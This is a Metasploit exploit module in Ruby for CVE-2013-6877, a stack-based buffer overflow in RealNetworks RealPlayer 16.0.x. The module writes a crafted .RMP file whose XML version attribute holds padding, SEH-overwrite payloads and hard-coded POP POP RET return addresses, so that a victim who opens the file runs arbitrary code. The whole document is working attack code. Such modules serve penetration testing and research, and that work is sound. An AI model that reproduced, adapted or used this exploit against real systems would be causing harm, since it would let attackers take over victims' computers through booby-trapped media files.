RealNetworks RealPlayer Version Attribute Buffer Overflow

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealNetworks RealPlayer Version Attribute Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability in
        version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
        improper bounds checking of the version and encoding attributes inside
        the XML declaration.

        By persuading the victim to open a specially-crafted .RMP file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gabor Seljan' # Vulnerability discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-6877' ],
          [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'seh'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'  => "\x00\x22",
          'Space'     => 532,
        },
      'Targets'       =>
        [
          [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51',
            {
              'OffsetClick' => 2540,       # Open via double click
              'OffsetMenu'  => 13600,      # Open via File -> Open
              'Ret'         => 0x641930C8  # POP POP RET from rpap3260.dll
            }
          ],
          [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
            {
              'OffsetClick' => 2540,       # Open via double click
              'OffsetMenu'  => 13600,      # Open via File -> Open
              'Ret'         => 0x63A630B8  # POP POP RET from rpap3260.dll
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 20 2013',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp'])
        ],
      self.class)

  end

  def exploit

    sploit =  rand_text_alpha_upper(target['OffsetClick'])
    sploit << generate_seh_payload(target.ret)
    sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length)
    sploit << generate_seh_payload(target.ret)
    sploit << rand_text_alpha_upper(17000) # Generate exception

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("<?xml version=\"" + sploit + "\"?>")

  end
end